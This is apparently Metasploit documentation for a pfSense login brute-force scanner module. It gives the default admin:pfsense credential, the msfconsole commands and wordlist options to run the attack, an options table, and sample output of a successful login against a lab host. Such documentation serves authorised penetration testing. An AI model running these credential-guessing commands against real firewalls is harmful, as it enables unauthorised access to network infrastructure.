documentation/modules/auxiliary/scanner/http/pfsense_login.md
This module attempts to bruteforce credentials for pfSense.
This module was specifically tested on version 2.7.2:
2.7.2 Download
https://atxfiles.netgate.com/mirror/downloads/
Note:
By default, pfSense comes with a built-in account named admin with the password being pfsense.
bundle exec ./msfconsole -quse auxiliary/scanner/http/pfsense_loginset ssl trueset pass_file ...set user_file ...runrun pass_file=data/wordlists/default_pass_for_services_unhash.txt user_file=data/wordlists/default_pass_for_services_unhash.txt STOP_ON_SUCCESS=true SSL=true rport=443[+] 192.168.207.158:443 - Login Successful: admin:pfsense
Set to true if an additional login attempt should be made with an empty password for every user.
How fast to bruteforce, from 0 to 5
A specific password to authenticate with
File containing passwords, one per line
Stop guessing when a credential works for a host
The number of concurrent threads (max one per host)
File containing users and passwords separated by space, one pair per line
File containing usernames, one per line
Whether to print output for all attempts
msf auxiliary(scanner/http/pfsense_login) > options
Module options (auxiliary/scanner/http/pfsense_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD pfsense no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.207.158 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI / yes The base path to the pfSense application
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME admin no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf auxiliary(scanner/http/pfsense_login) > run
[+] 192.168.207.158:443 - Login Successful: admin:pfsense
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed